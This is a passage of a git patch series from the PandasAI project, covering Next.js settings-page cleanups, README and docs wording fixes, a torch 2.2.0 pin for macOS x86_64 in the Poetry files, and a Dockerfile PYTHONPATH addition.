From e19da71e841bafb14201485ed2d376c7d33905c6 Mon Sep 17 00:00:00 2001
From: AlessandroMarc <52158784+AlessandroMarc@users.noreply.github.com>
Date: Fri, 18 Oct 2024 20:06:35 +0200
Subject: [PATCH 01/58] fix: remove duplicate `dynamic` exports (#1399)
---
client/app/(ee)/settings/logs/page.tsx | 18 ++---
client/app/settings/datasets/[id]/page.tsx | 44 +++++-----
client/app/settings/datasets/page.tsx | 80 ++++++++-----------
client/app/settings/page.tsx | 6 +-
.../settings/workspaces/addspaces/page.tsx | 42 +++++-----
.../settings/workspaces/editspaces/page.tsx | 38 ++++-----
client/app/settings/workspaces/page.tsx | 70 +++++++---------
7 files changed, 132 insertions(+), 166 deletions(-)
diff --git a/client/app/(ee)/settings/logs/page.tsx b/client/app/(ee)/settings/logs/page.tsx
index 90f266620..786b47fcd 100644
--- a/client/app/(ee)/settings/logs/page.tsx
+++ b/client/app/(ee)/settings/logs/page.tsx
@@ -2,17 +2,15 @@ import React from "react";
import { GetLogs } from "@/services/logs";
import LogsCard from "./logs-card";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function Logs() {
- const data = await GetLogs();
+ const data = await GetLogs();
- return (
-
-
Logs
-
-
- );
+ return (
+
+
Logs
+
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/datasets/[id]/page.tsx b/client/app/settings/datasets/[id]/page.tsx
index 84600f608..6380e1239 100644
--- a/client/app/settings/datasets/[id]/page.tsx
+++ b/client/app/settings/datasets/[id]/page.tsx
@@ -3,34 +3,32 @@ import Link from "next/link";
import DatasetCard from "./DatasetCard";
import { GetDatasetDetails } from "@/services/datasets";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
interface PageProps {
- params: {
- id: string;
- };
+ params: {
+ id: string;
+ };
}
export default async function DatasetDetailsPage({ params }: PageProps) {
- const data = await GetDatasetDetails(params.id);
- const dataframe = data?.dataset;
+ const data = await GetDatasetDetails(params.id);
+ const dataframe = data?.dataset;
- return (
- <>
-
-
- Datasets
- {` › ${dataframe?.name || ""}`}
-
+ return (
+ <>
+
+
+ Datasets
+ {` › ${dataframe?.name || ""}`}
+
-
-
- >
- );
+
+
+ >
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/datasets/page.tsx b/client/app/settings/datasets/page.tsx
index 1481e6903..2a70fc162 100644
--- a/client/app/settings/datasets/page.tsx
+++ b/client/app/settings/datasets/page.tsx
@@ -7,53 +7,43 @@ import { Button } from "@/components/ui/button";
import { GetAllDataSets } from "@/services/datasets";
import AddNewCard from "./AddNewCard";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function Datasets() {
- const data = await GetAllDataSets();
+ const data = await GetAllDataSets();
- return (
-
-
Datasets
-
- {data?.datasets?.map((item) => (
-
-
-
-
-
-
-
-
- ))}
+ return (
+
+
Datasets
+
+ {data?.datasets?.map(item => (
+
+
+
+
+
+
+
+
+ ))}
-
-
-
-
-
- );
+
+
+
+
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/page.tsx b/client/app/settings/page.tsx
index 95880dc1a..0dfa41602 100644
--- a/client/app/settings/page.tsx
+++ b/client/app/settings/page.tsx
@@ -1,9 +1,7 @@
import { redirect } from "next/navigation";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default function Home() {
- redirect("/settings/datasets");
+ redirect("/settings/datasets");
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/workspaces/addspaces/page.tsx b/client/app/settings/workspaces/addspaces/page.tsx
index 3f1fadc8f..75c301210 100644
--- a/client/app/settings/workspaces/addspaces/page.tsx
+++ b/client/app/settings/workspaces/addspaces/page.tsx
@@ -4,32 +4,28 @@ import { GetAllDataSets } from "@/services/datasets";
import AddSpaceCard from "./AddSpaceCard";
import { Button } from "@/components/ui/button";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function AddSpaces() {
- const data = await GetAllDataSets();
+ const data = await GetAllDataSets();
- return (
-
-
- Workspaces
- › New
-
+ return (
+
+
+ Workspaces
+ › New
+
- {data?.datasets?.length === 0 ? (
-
-
- No datasets available, please add one
-
+ {data?.datasets?.length === 0 ? (
+
+
No datasets available, please add one
-
-
-
- ) : (
-
- )}
-
- );
+
+
+
+ ) : (
+
+ )}
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/workspaces/editspaces/page.tsx b/client/app/settings/workspaces/editspaces/page.tsx
index aa84ccc55..1c254d1b5 100644
--- a/client/app/settings/workspaces/editspaces/page.tsx
+++ b/client/app/settings/workspaces/editspaces/page.tsx
@@ -4,28 +4,24 @@ import { GetAllDataSets } from "@/services/datasets";
import EditSpaceCard from "./EditSpaceCard";
import { GetWorkspaceDetails } from "@/services/spaces";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function EditWorkSpaces({ searchParams }) {
- const data = await GetAllDataSets();
- const workspaceDetails = await GetWorkspaceDetails(searchParams.id);
+ const data = await GetAllDataSets();
+ const workspaceDetails = await GetWorkspaceDetails(searchParams.id);
- return (
-
-
- Workspaces
-
-
-
- {workspaceDetails?.name && ` › ${workspaceDetails?.name}`}
-
- {" "}
- › Edit
-
-
-
-
- );
+ return (
+
+
+ Workspaces
+
+
+ {workspaceDetails?.name && ` › ${workspaceDetails?.name}`}
+ {" "}
+ › Edit
+
+
+
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/workspaces/page.tsx b/client/app/settings/workspaces/page.tsx
index 5de7a53ce..d66fdf609 100644
--- a/client/app/settings/workspaces/page.tsx
+++ b/client/app/settings/workspaces/page.tsx
@@ -6,49 +6,39 @@ import AppTooltip from "@/components/AppTooltip";
import { Button } from "@/components/ui/button";
import { GetAllWorkspaces } from "@/services/spaces";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function WorkSpaces() {
- const data = await GetAllWorkspaces();
+ const data = await GetAllWorkspaces();
- return (
-
-
Workspaces
+ return (
+
+
Workspaces
-
- {data?.map((item, index) => (
-
-
-
+
+ {data?.map((item, index) => (
+
+
-
- ))}
-
-
-
-
-
- );
+
+
+
+
+
+
+
+ ))}
+
+
+
+
+
+ );
}
-export const dynamic='force-dynamic';
-
From 48664d73551e0dfee34ec843d92dac6df1504ccf Mon Sep 17 00:00:00 2001
From: Smoothengineer <160827599+Smoothengineer@users.noreply.github.com>
Date: Sun, 20 Oct 2024 21:37:49 +0530
Subject: [PATCH 02/58] chore: minor updates in the README (#1400)
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 921f9f2da..da7eeeee6 100644
--- a/README.md
+++ b/README.md
@@ -8,11 +8,11 @@
[![Downloads](https://static.pepy.tech/badge/pandasai)](https://pepy.tech/project/pandasai) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Open in Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1ZnO-njhL7TBOYPZaqvMvGtsjckZKrv2E?usp=sharing)
-PandasAI is a Python platform that makes it easy to ask questions to your data in natural language. It helps non-technical users to interact with their data in a more natural way, and it helps technical users to save time and effort when working with data.
+PandasAI is a Python platform that makes it easy to ask questions to your data in natural language. It helps non-technical users to interact with their data in a more natural way, and it helps technical users to save time, and effort when working with data.
# 🚀 Deploying PandasAI
-PandasAI can be used in a variety of ways. You can easily use it in your Jupyter notebooks or streamlit apps, or you can deploy it as a REST API such as with FastAPI or Flask.
+PandasAI can be used in a variety of ways. You can easily use it in your Jupyter notebooks or Streamlit apps, or you can deploy it as a REST API such as with FastAPI or Flask.
If you are interested in the managed PandasAI Cloud or our self-hosted Enterprise Offering, [contact us](https://forms.gle/JEUqkwuTqFZjhP7h8).
@@ -20,7 +20,7 @@ If you are interested in the managed PandasAI Cloud or our self-hosted Enterpris
You can find the full documentation for PandasAI [here](https://pandas-ai.readthedocs.io/en/latest/).
-You can either decide to use PandasAI in your Jupyter notebooks, streamlit apps, or use the client and server architecture from the repo.
+You can either decide to use PandasAI in your Jupyter notebooks, Streamlit apps, or use the client and server architecture from the repo.
## ☁️ Using the platform
From c4478b58d11d7d687acea6fb2c2920731d7fce0f Mon Sep 17 00:00:00 2001
From: Muhammad Adam <118662764+Muhammad-Adam1@users.noreply.github.com>
Date: Tue, 22 Oct 2024 19:14:53 +0500
Subject: [PATCH 03/58] docs: update library.mdx (#1406)
Add 's' at the end of the keyword "clarification_question"
agent.clarification_question('What is the GDP of the United States?')
---
docs/library.mdx | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/library.mdx b/docs/library.mdx
index 360030817..a1e01097d 100644
--- a/docs/library.mdx
+++ b/docs/library.mdx
@@ -176,7 +176,7 @@ agent.chat('And which one has the most deals?')
An agent will also be able to ask clarification questions if it does not have enough information to answer the query. For example:
```python
-agent.clarification_question('What is the GDP of the United States?')
+agent.clarification_questions('What is the GDP of the United States?')
```
this will return up to 3 clarification questions that the agent can ask the user to get more information to answer the query.
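
For readers following along, a minimal usage sketch of the corrected method (the `sales.csv` file name is illustrative; any data source accepted by `Agent` works):

```python
from pandasai import Agent

agent = Agent("sales.csv")  # hypothetical data file

# clarification_questions() returns up to three follow-up questions
for question in agent.clarification_questions(
    "What is the GDP of the United States?"
):
    print(question)
```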
From 30b2fa7620e26188d5980834d8fc1c411b687523 Mon Sep 17 00:00:00 2001
From: giuseppe-coco <76009241+giuseppe-coco@users.noreply.github.com>
Date: Tue, 29 Oct 2024 18:36:06 +0100
Subject: [PATCH 04/58] fix[#1415]: use torch 2.2.0 on macOS x86_64 (#1417)
* Add /app to PYTHONPATH
* fix for issue #1415
---------
Co-authored-by: Giuseppe Coco
---
poetry.lock | 144 +++++++++++++++++++++++++++++++++++++++-------
pyproject.toml | 4 ++
server/Dockerfile | 2 +
3 files changed, 130 insertions(+), 20 deletions(-)
diff --git a/poetry.lock b/poetry.lock
index cc828313b..ddacd0fd1 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.2 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand.
[[package]]
name = "aiohappyeyeballs"
@@ -1627,7 +1627,7 @@ files = [
name = "fsspec"
version = "2024.9.0"
description = "File-system specification"
-optional = true
+optional = false
python-versions = ">=3.8"
files = [
{file = "fsspec-2024.9.0-py3-none-any.whl", hash = "sha256:a0947d552d8a6efa72cc2c730b12c41d043509156966cca4fb157b0f2a0c574b"},
@@ -4037,7 +4037,7 @@ files = [
name = "mpmath"
version = "1.3.0"
description = "Python library for arbitrary-precision floating-point arithmetic"
-optional = true
+optional = false
python-versions = "*"
files = [
{file = "mpmath-1.3.0-py3-none-any.whl", hash = "sha256:a0b2b9fe80bbcd81a6647ff13108738cfb482d481d826cc0e02f5b35e5c88d2c"},
@@ -4272,7 +4272,7 @@ pyarrow = ["pyarrow (>=11.0.0)"]
name = "networkx"
version = "3.2.1"
description = "Python package for creating and manipulating graphs and networks"
-optional = true
+optional = false
python-versions = ">=3.9"
files = [
{file = "networkx-3.2.1-py3-none-any.whl", hash = "sha256:f18c69adc97877c42332c170849c96cefa91881c99a7cb3e95b7c659ebdc1ec2"},
@@ -4346,7 +4346,7 @@ files = [
name = "nvidia-cublas-cu12"
version = "12.1.3.1"
description = "CUBLAS native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cublas_cu12-12.1.3.1-py3-none-manylinux1_x86_64.whl", hash = "sha256:ee53ccca76a6fc08fb9701aa95b6ceb242cdaab118c3bb152af4e579af792728"},
@@ -4357,7 +4357,7 @@ files = [
name = "nvidia-cuda-cupti-cu12"
version = "12.1.105"
description = "CUDA profiling tools runtime libs."
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cuda_cupti_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:e54fde3983165c624cb79254ae9818a456eb6e87a7fd4d56a2352c24ee542d7e"},
@@ -4368,7 +4368,7 @@ files = [
name = "nvidia-cuda-nvrtc-cu12"
version = "12.1.105"
description = "NVRTC native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cuda_nvrtc_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:339b385f50c309763ca65456ec75e17bbefcbbf2893f462cb8b90584cd27a1c2"},
@@ -4379,18 +4379,31 @@ files = [
name = "nvidia-cuda-runtime-cu12"
version = "12.1.105"
description = "CUDA Runtime native Libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cuda_runtime_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:6e258468ddf5796e25f1dc591a31029fa317d97a0a94ed93468fc86301d61e40"},
{file = "nvidia_cuda_runtime_cu12-12.1.105-py3-none-win_amd64.whl", hash = "sha256:dfb46ef84d73fababab44cf03e3b83f80700d27ca300e537f85f636fac474344"},
]
+[[package]]
+name = "nvidia-cudnn-cu12"
+version = "8.9.2.26"
+description = "cuDNN runtime libraries"
+optional = false
+python-versions = ">=3"
+files = [
+ {file = "nvidia_cudnn_cu12-8.9.2.26-py3-none-manylinux1_x86_64.whl", hash = "sha256:5ccb288774fdfb07a7e7025ffec286971c06d8d7b4fb162525334616d7629ff9"},
+]
+
+[package.dependencies]
+nvidia-cublas-cu12 = "*"
+
[[package]]
name = "nvidia-cudnn-cu12"
version = "9.1.0.70"
description = "cuDNN runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cudnn_cu12-9.1.0.70-py3-none-manylinux2014_x86_64.whl", hash = "sha256:165764f44ef8c61fcdfdfdbe769d687e06374059fbb388b6c89ecb0e28793a6f"},
@@ -4404,7 +4417,7 @@ nvidia-cublas-cu12 = "*"
name = "nvidia-cufft-cu12"
version = "11.0.2.54"
description = "CUFFT native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cufft_cu12-11.0.2.54-py3-none-manylinux1_x86_64.whl", hash = "sha256:794e3948a1aa71fd817c3775866943936774d1c14e7628c74f6f7417224cdf56"},
@@ -4415,7 +4428,7 @@ files = [
name = "nvidia-curand-cu12"
version = "10.3.2.106"
description = "CURAND native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_curand_cu12-10.3.2.106-py3-none-manylinux1_x86_64.whl", hash = "sha256:9d264c5036dde4e64f1de8c50ae753237c12e0b1348738169cd0f8a536c0e1e0"},
@@ -4426,7 +4439,7 @@ files = [
name = "nvidia-cusolver-cu12"
version = "11.4.5.107"
description = "CUDA solver native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cusolver_cu12-11.4.5.107-py3-none-manylinux1_x86_64.whl", hash = "sha256:8a7ec542f0412294b15072fa7dab71d31334014a69f953004ea7a118206fe0dd"},
@@ -4442,7 +4455,7 @@ nvidia-nvjitlink-cu12 = "*"
name = "nvidia-cusparse-cu12"
version = "12.1.0.106"
description = "CUSPARSE native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cusparse_cu12-12.1.0.106-py3-none-manylinux1_x86_64.whl", hash = "sha256:f3b50f42cf363f86ab21f720998517a659a48131e8d538dc02f8768237bd884c"},
@@ -4452,11 +4465,21 @@ files = [
[package.dependencies]
nvidia-nvjitlink-cu12 = "*"
+[[package]]
+name = "nvidia-nccl-cu12"
+version = "2.19.3"
+description = "NVIDIA Collective Communication Library (NCCL) Runtime"
+optional = false
+python-versions = ">=3"
+files = [
+ {file = "nvidia_nccl_cu12-2.19.3-py3-none-manylinux1_x86_64.whl", hash = "sha256:a9734707a2c96443331c1e48c717024aa6678a0e2a4cb66b2c364d18cee6b48d"},
+]
+
[[package]]
name = "nvidia-nccl-cu12"
version = "2.20.5"
description = "NVIDIA Collective Communication Library (NCCL) Runtime"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_nccl_cu12-2.20.5-py3-none-manylinux2014_aarch64.whl", hash = "sha256:1fc150d5c3250b170b29410ba682384b14581db722b2531b0d8d33c595f33d01"},
@@ -4467,7 +4490,7 @@ files = [
name = "nvidia-nvjitlink-cu12"
version = "12.6.68"
description = "Nvidia JIT LTO Library"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_nvjitlink_cu12-12.6.68-py3-none-manylinux2014_aarch64.whl", hash = "sha256:b3fd0779845f68b92063ab1393abab1ed0a23412fc520df79a8190d098b5cd6b"},
@@ -4479,7 +4502,7 @@ files = [
name = "nvidia-nvtx-cu12"
version = "12.1.105"
description = "NVIDIA Tools Extension"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_nvtx_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:dc21cf308ca5691e7c04d962e213f8a4aa9bbfa23d95412f452254c2caeb09e5"},
@@ -7471,7 +7494,7 @@ snowflake = ["snowflake-connector-python (>=2.8.0)", "snowflake-snowpark-python[
name = "sympy"
version = "1.13.3"
description = "Computer algebra system (CAS) in Python"
-optional = true
+optional = false
python-versions = ">=3.8"
files = [
{file = "sympy-1.13.3-py3-none-any.whl", hash = "sha256:54612cf55a62755ee71824ce692986f23c88ffa77207b30c1368eda4a7060f73"},
@@ -7728,11 +7751,69 @@ files = [
{file = "tomlkit-0.13.2.tar.gz", hash = "sha256:fff5fe59a87295b278abd31bec92c15d9bc4a06885ab12bcea52c71119392e79"},
]
+[[package]]
+name = "torch"
+version = "2.2.0"
+description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration"
+optional = false
+python-versions = ">=3.8.0"
+files = [
+ {file = "torch-2.2.0-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:d366158d6503a3447e67f8c0ad1328d54e6c181d88572d688a625fac61b13a97"},
+ {file = "torch-2.2.0-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:707f2f80402981e9f90d0038d7d481678586251e6642a7a6ef67fc93511cb446"},
+ {file = "torch-2.2.0-cp310-cp310-win_amd64.whl", hash = "sha256:15c8f0a105c66b28496092fca1520346082e734095f8eaf47b5786bac24b8a31"},
+ {file = "torch-2.2.0-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:0ca4df4b728515ad009b79f5107b00bcb2c63dc202d991412b9eb3b6a4f24349"},
+ {file = "torch-2.2.0-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:3d3eea2d5969b9a1c9401429ca79efc668120314d443d3463edc3289d7f003c7"},
+ {file = "torch-2.2.0-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:0d1c580e379c0d48f0f0a08ea28d8e373295aa254de4f9ad0631f9ed8bc04c24"},
+ {file = "torch-2.2.0-cp311-cp311-manylinux2014_aarch64.whl", hash = "sha256:9328e3c1ce628a281d2707526b4d1080eae7c4afab4f81cea75bde1f9441dc78"},
+ {file = "torch-2.2.0-cp311-cp311-win_amd64.whl", hash = "sha256:03c8e660907ac1b8ee07f6d929c4e15cd95be2fb764368799cca02c725a212b8"},
+ {file = "torch-2.2.0-cp311-none-macosx_10_9_x86_64.whl", hash = "sha256:da0cefe7f84ece3e3b56c11c773b59d1cb2c0fd83ddf6b5f7f1fd1a987b15c3e"},
+ {file = "torch-2.2.0-cp311-none-macosx_11_0_arm64.whl", hash = "sha256:f81d23227034221a4a4ff8ef24cc6cec7901edd98d9e64e32822778ff01be85e"},
+ {file = "torch-2.2.0-cp312-cp312-manylinux1_x86_64.whl", hash = "sha256:dcbfb2192ac41ca93c756ebe9e2af29df0a4c14ee0e7a0dd78f82c67a63d91d4"},
+ {file = "torch-2.2.0-cp312-cp312-manylinux2014_aarch64.whl", hash = "sha256:9eeb42971619e24392c9088b5b6d387d896e267889d41d267b1fec334f5227c5"},
+ {file = "torch-2.2.0-cp312-cp312-win_amd64.whl", hash = "sha256:c718b2ca69a6cac28baa36d86d8c0ec708b102cebd1ceb1b6488e404cd9be1d1"},
+ {file = "torch-2.2.0-cp312-none-macosx_10_9_x86_64.whl", hash = "sha256:f11d18fceb4f9ecb1ac680dde7c463c120ed29056225d75469c19637e9f98d12"},
+ {file = "torch-2.2.0-cp312-none-macosx_11_0_arm64.whl", hash = "sha256:ee1da852bfd4a7e674135a446d6074c2da7194c1b08549e31eae0b3138c6b4d2"},
+ {file = "torch-2.2.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:0d819399819d0862268ac531cf12a501c253007df4f9e6709ede8a0148f1a7b8"},
+ {file = "torch-2.2.0-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:08f53ccc38c49d839bc703ea1b20769cc8a429e0c4b20b56921a9f64949bf325"},
+ {file = "torch-2.2.0-cp38-cp38-win_amd64.whl", hash = "sha256:93bffe3779965a71dab25fc29787538c37c5d54298fd2f2369e372b6fb137d41"},
+ {file = "torch-2.2.0-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:c17ec323da778efe8dad49d8fb534381479ca37af1bfc58efdbb8607a9d263a3"},
+ {file = "torch-2.2.0-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:c02685118008834e878f676f81eab3a952b7936fa31f474ef8a5ff4b5c78b36d"},
+ {file = "torch-2.2.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:d9f39d6f53cec240a0e3baa82cb697593340f9d4554cee6d3d6ca07925c2fac0"},
+ {file = "torch-2.2.0-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:51770c065206250dc1222ea7c0eff3f88ab317d3e931cca2aee461b85fbc2472"},
+ {file = "torch-2.2.0-cp39-cp39-win_amd64.whl", hash = "sha256:008e4c6ad703de55af760c73bf937ecdd61a109f9b08f2bbb9c17e7c7017f194"},
+ {file = "torch-2.2.0-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:de8680472dd14e316f42ceef2a18a301461a9058cd6e99a1f1b20f78f11412f1"},
+ {file = "torch-2.2.0-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:99e1dcecb488e3fd25bcaac56e48cdb3539842904bdc8588b0b255fde03a254c"},
+]
+
+[package.dependencies]
+filelock = "*"
+fsspec = "*"
+jinja2 = "*"
+networkx = "*"
+nvidia-cublas-cu12 = {version = "12.1.3.1", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cuda-cupti-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cuda-nvrtc-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cuda-runtime-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cudnn-cu12 = {version = "8.9.2.26", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cufft-cu12 = {version = "11.0.2.54", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-curand-cu12 = {version = "10.3.2.106", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cusolver-cu12 = {version = "11.4.5.107", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cusparse-cu12 = {version = "12.1.0.106", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-nccl-cu12 = {version = "2.19.3", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-nvtx-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+sympy = "*"
+triton = {version = "2.2.0", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+typing-extensions = ">=4.8.0"
+
+[package.extras]
+opt-einsum = ["opt-einsum (>=3.3)"]
+optree = ["optree (>=0.9.1)"]
+
[[package]]
name = "torch"
version = "2.4.1"
description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration"
-optional = true
+optional = false
python-versions = ">=3.8.0"
files = [
{file = "torch-2.4.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:362f82e23a4cd46341daabb76fba08f04cd646df9bfaf5da50af97cb60ca4971"},
@@ -7890,11 +7971,34 @@ torchhub = ["filelock", "huggingface-hub (>=0.23.2,<1.0)", "importlib-metadata",
video = ["av (==9.2.0)", "decord (==0.6.0)"]
vision = ["Pillow (>=10.0.1,<=15.0)"]
+[[package]]
+name = "triton"
+version = "2.2.0"
+description = "A language and compiler for custom Deep Learning operations"
+optional = false
+python-versions = "*"
+files = [
+ {file = "triton-2.2.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a2294514340cfe4e8f4f9e5c66c702744c4a117d25e618bd08469d0bfed1e2e5"},
+ {file = "triton-2.2.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:da58a152bddb62cafa9a857dd2bc1f886dbf9f9c90a2b5da82157cd2b34392b0"},
+ {file = "triton-2.2.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0af58716e721460a61886668b205963dc4d1e4ac20508cc3f623aef0d70283d5"},
+ {file = "triton-2.2.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e8fe46d3ab94a8103e291bd44c741cc294b91d1d81c1a2888254cbf7ff846dab"},
+ {file = "triton-2.2.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8ce26093e539d727e7cf6f6f0d932b1ab0574dc02567e684377630d86723ace"},
+ {file = "triton-2.2.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:227cc6f357c5efcb357f3867ac2a8e7ecea2298cd4606a8ba1e931d1d5a947df"},
+]
+
+[package.dependencies]
+filelock = "*"
+
+[package.extras]
+build = ["cmake (>=3.20)", "lit"]
+tests = ["autopep8", "flake8", "isort", "numpy", "pytest", "scipy (>=1.7.1)", "torch"]
+tutorials = ["matplotlib", "pandas", "tabulate", "torch"]
+
[[package]]
name = "triton"
version = "3.0.0"
description = "A language and compiler for custom Deep Learning operations"
-optional = true
+optional = false
python-versions = "*"
files = [
{file = "triton-3.0.0-1-cp310-cp310-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:e1efef76935b2febc365bfadf74bcb65a6f959a9872e5bddf44cc9e0adce1e1a"},
@@ -8718,4 +8822,4 @@ yfinance = ["yfinance"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<3.9.7 || >3.9.7,<4.0"
-content-hash = "1b765afee999b83c0fc7f1c56c1a26656d91ca3e3455c9488becdd3e853fc31c"
+content-hash = "655ec13eec4de9a66fc4acdf470254ed7b7f25426c88c785df8bd9d1698972db"
diff --git a/pyproject.toml b/pyproject.toml
index d9afad8af..2b2a10714 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -57,6 +57,10 @@ sentence-transformers = {version = "^2.3.0", optional = true}
sqlglot = {extras = ["rs"], version = "^25.0.3"}
pymilvus = {version = "^2.4.6", optional = true}
milvus-model = {version = "^0.2.7", optional = true}
+torch = [
+ { version = "2.2.0", markers = "sys_platform == 'darwin' and platform_machine == 'x86_64'" },
+ { version = "2.4.1", markers = "sys_platform != 'darwin'" }
+]
[tool.poetry.group.dev]
optional = true
diff --git a/server/Dockerfile b/server/Dockerfile
index 2896796e5..be9a5fb88 100644
--- a/server/Dockerfile
+++ b/server/Dockerfile
@@ -21,6 +21,8 @@ RUN curl -sSL https://install.python-poetry.org | python3 -
# Add Poetry to PATH
ENV PATH="/root/.local/bin:$PATH"
+ENV PYTHONPATH=/app
+
# Copy the current directory contents into the container at /app
COPY . /app
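
The `pyproject.toml` change above selects the torch build per platform via PEP 508 environment markers. As a rough illustration of how such markers evaluate (using the third-party `packaging` library, which is not part of this patch):

```python
from packaging.markers import Marker

darwin_x86 = Marker("sys_platform == 'darwin' and platform_machine == 'x86_64'")

# Poetry pins torch 2.2.0 where this marker is true, 2.4.1 everywhere else
print(darwin_x86.evaluate({"sys_platform": "darwin", "platform_machine": "x86_64"}))  # True
print(darwin_x86.evaluate({"sys_platform": "linux", "platform_machine": "x86_64"}))   # False
```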
From f32bd0d3bcb56e52432ab10fcfe695050c55755a Mon Sep 17 00:00:00 2001
From: giuseppe-coco <76009241+giuseppe-coco@users.noreply.github.com>
Date: Tue, 29 Oct 2024 18:36:31 +0100
Subject: [PATCH 05/58] chore: add /app to PYTHONPATH (#1416)
Co-authored-by: Giuseppe Coco
From 719043c62bf9e0740854d7367f757bdf1d3ee6b3 Mon Sep 17 00:00:00 2001
From: Muhammad Adam <118662764+Muhammad-Adam1@users.noreply.github.com>
Date: Tue, 29 Oct 2024 22:37:55 +0500
Subject: [PATCH 06/58] docs: update llms.mdx (#1410)
Add documentation on how to use the pandasai.json file
---
docs/llms.mdx | 24 +++++++++++++++++++++---
1 file changed, 21 insertions(+), 3 deletions(-)
diff --git a/docs/llms.mdx b/docs/llms.mdx
index e3b4720db..98897dda4 100644
--- a/docs/llms.mdx
+++ b/docs/llms.mdx
@@ -7,11 +7,11 @@ The generated code is then executed to produce the result.
[![Choose the LLM](https://cdn.loom.com/sessions/thumbnails/5496c9c07ee04f69bfef1bc2359cd591-00001.jpg)](https://www.loom.com/share/5496c9c07ee04f69bfef1bc2359cd591 "Choose the LLM")
-You can either choose a LLM by instantiating one and passing it to the `SmartDataFrame` or `SmartDatalake` constructor,
-or you can specify one in the `pandasai.json` file.
+You can choose an LLM either by instantiating it and passing it to the `SmartDataFrame` or `SmartDatalake` constructor,
